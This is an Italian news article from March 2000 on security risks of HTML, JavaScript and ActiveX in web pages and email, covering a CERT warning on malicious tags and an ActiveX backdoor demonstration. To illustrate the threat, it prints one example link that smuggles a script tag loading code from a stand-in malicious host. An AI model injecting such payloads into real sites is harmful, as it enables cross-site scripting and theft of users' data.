Javascript, Java e ActiveX sono ormai gli strumenti indispensabili per l’integrazione nelle pagine Web di quell’interattività tipica di Internet dei nostri giorni, strumenti di programmazione che ampliano moltissimo le potenzialità dell’HTML, la “lingua franca” di Internet. Ma è proprio la potenza di questo connubio fra HTML e linguaggi di script che comincia ad impensierire gli esperti di sicurezza di tutto il mondo: basti leggere le numerose notizie di questi ultimi mesi riguardanti hacker che hanno sfruttato particolari ?buchi? nelle applicazioni per Internet, in primo luogo browser e client di posta elettronica.
Proprio di questi giorni il monito ufficiale del CERT che, sul proprio sito Web, ha pubblicato alcune considerazioni riguardo l’uso (o l’abuso) di tag HTML potenzialmente ?maliziosi?, applicabili anche a posta elettronica e newsgroup.
Che un sito Web possa essere incluso nelle considerazioni di eventuali abusi del codice HTML si capisce, ma cosa possono avere a che fare una e-mail spedita ad un amico od un post mandato sul proprio newsgroup preferito? Semplice: il linguaggio HTML è ormai uscito dal Web approdando anche ad altre risorse di Internet: e-mail, newsgroup, mailing-list, chat…
L’uscita del documento ufficiale sopra citato dichiara che i sistemi potenzialmente colpiti da tale ?infezione? sono i browser ed i server Web che generano dinamicamente pagine basate sull’introduzione di dati non validi o non sicuri (pensiamo ad esempio ai tanti moduli di iscrizione sparsi per la Rete).
Esemplificando, possiamo dire che il rischio si può produrre quando, ad esempio, ci iscriviamo ad una banalissima mailing-list, ad una newsletter o ad un modulo in linea (che si tratti di un sito di commercio elettronico o di una semplice indagine di mercato) credendo di indirizzare i dati verso il server dove siamo approdati qualche minuto prima, mentre, in realtà, tutti i dati interessanti vengono reindirizzati altrove. Tutto questo tramite degli script inglobati nel codice HTML.
Facciamo un esempio:
“<A HREF=?http://esempio.com/commento.cgi?miocommento=<SCRIPT SRC=’http://sito-malizioso/file-malizioso’></SCRIPT>?> Clicca qui!</A>”
In questo caso un comunissimo link di pubblicità al nuovo prodotto di casa PincoPallo contenuto nella mail appena pervenutaci potrebbe tramutarsi in una pericolosa violazione alla nostra privacy.
Certo, questo pericolo potrebbe essere escluso a priori se (come da Netiquette – http://www.inferentia.it/netiquette) adottassimo il sistema del solo testo per l’invio della nostra corrispondenza (ad esempio inoltrando una e-mail ricevuta), sia essa posta elettronica od un post su di un gruppo di discussione, però dobbiamo tener conto che i nuovi client e-mail supportano sempre più massicciamente e completamente il formato HTML, fra cui Outlook, Messenger e Eudora (inossidabile software per puristi della posta elettronica, è ormai arrivato ad implementare l’uso della formattazione avanzata nelle ultime versioni del programma).
Inoltre, se è vero che tale pericolo potrebbe essere evitato inviando messaggi in puro testo (le opzioni di conversione automatica HTML-Plain Text per la posta in arrivo non funzionano nel 100% dei casi), è altrettanto vero che l’utenza di Internet non è educata a comprendere la differenza tra un link ?sano? ed uno ?malizioso?, poiché, giustamente, non è doveroso né tantomeno necessario diventare programmatori per poter navigare sul Web, un luogo che per sua stessa natura dovrebbe poter essere consultato nel modo più semplice e sicuro possibile, senza pensare troppo se la connessione avviene via SSL, SET o su protocollo non protetto.
L’esempio sopra citato potrebbe essere adattato comunque ad una qualsiasi esigenza del programmatore ?malizioso? inserendo nel link uno script a proprio piacere, oppure un link ad uno script esterno, o ancora ad un controllo ActiveX/Java.
Attualmente i tag inclusi nell’ultima versione dell’HTML, ovvero la 4.1, sono davvero molti e di varia natura e potenza, troviamo infatti “<SCRIPT>”, “<OBJECT>”, “<APPLET>” e “<EMBED>”, praticamente possiamo inserire in una mail tutto il potenziale tecnologico esistente nel panorama Web attuale (dal gioco in Java al setup automatico eseguito con ActiveX).
Pensando poi agli attuali strumenti per hacking esistenti sul mercato (come SilkRope) viene facile pensare che diventi sempre più semplice la possibilità di eseguire l’installazione di una backdoor ascoltando il file musicale di Natale che ci ha appena spedito un nostro caro amico, che a sua volta l’ha ricevuto da qualcun altro e così via.
Proprio in questi giorni è stato pubblicato un articolo sulla rivista on-line Wired che riporta di come uno sviluppatore Web spagnolo sia riuscito a dimostrare in che modo un controllo ActiveX (proprio per il setup automatico on-line) sia fonte di una backdoor non proprio ?ufficiale? di Microsoft e decisamente insicura.
In pratica, ciò che è stato appurato dal signor Juan Cuartango nella sua pagina dimostrativa è come ?la perdita di sicurezza più basilare sia data dal potere di far girare liberamente del codice nel proprio sistema?. Come dichiarato a Wired in una sua e-mail, ?se io configuro il mio Internet Explorer per avvisarmi quando un componente firmato/approvato vuole attivarsi nel mio browser, io voglio essere effettivamente avvisato. Il software di Microsoft, invece, salta le impostazioni nella configurazione di sicurezza.?
Per chi non ne fosse a conoscenza, ?Active Setup? è un controllo ActiveX speciale per l’installazione di software (pensate al normale Internet Explorer Update); gli ActiveX sono dei piccoli programmi usati in molti siti Web per scaricare ed eseguire comandi speciali nel computer degli utenti. Una volta installati, questi controlli possono essere riutilizzati anche in futuro.
E mentre Cuartango dichiara che questa backdoor è un vero e proprio rischio, ed a disposizione di chiunque la voglia sfruttare poiché troppo facile da usare, Microsoft, per voce di Steve Lipner (responsabile del Security Response Center di Microsoft) si difende dicendo che ?[Active Setup] è stato creato per facilitare l’installazione di software convalidato e sicuro, fornendo una migliore esperienza per tutti gli utenti che accedano alle nostre sezioni di download per aggiornare il proprio software.?
Ma Cuartango non demorde e denuncia: ?Questo software agisce sul vostro sistema in modo del tutto silenzioso, provate ad immaginare che Microsoft voglia accedere ai vostri cookie. Potranno tranquillamente e silenziosamente analizzare i dati contenuti in essi ogni qualvolta accediate ai loro server via Internet, semplicemente eseguendo un applicativo sviluppato ad hoc.?
Sentito il parere di un altro esperto, Richard Smith, una frase diventa decisamente eloquente: ?Potrà qualcuno usare questo buco? Perché Microsoft dovrebbe usarlo? Milioni di domande potrebbero sorgere, ma certamente questa porta è stata aperta un po’ troppo.?
Sebbene la notizia possa sembrare poco preoccupante, restando legati alla buona regola che gli allegati (e così i link) vanno tenuti a bada e aperti solo quando si ha la certezza assoluta di ciò che si sta facendo, in realtà ci troviamo di fronte ad una nuova frontiera di possibili attacchi sempre meno controllabili, legati all’architettura propria dell’HTML 4 e la possibilità di includere e avviare script alla semplice apertura della posta incriminata (pensiamo alla funzione onLoad di Javascript, che attiva un evento quando la pagina è stata caricata) lasciando sempre meno il controllo al normale utente e la possibilità ai programmatori ?giocherelloni? di sbizzarrirsi nelle più svariate performance di ?hacking?!
Forse il futuro non sarà così duro, dato che sempre più software antivirus controllano attivamente le funzioni ActiveX e Java nelle mail, post e navigazione Web, ma se è vero che Happy99 (senza dover andare in programmi più sofisticati come Back Orifice o Netbus) ha spopolato per quasi un anno, allora può nascere qualche timore verso la continua implementazione di funzionalità sempre più avanzate e integrate con il sistema operativo stesso, sia esso Windows, Macintosh o Unix, senza la dovuta cautela nella parte del software più importante: la tutela della sicurezza degli utenti.
Ti potrebbe interessare
13 mar 2000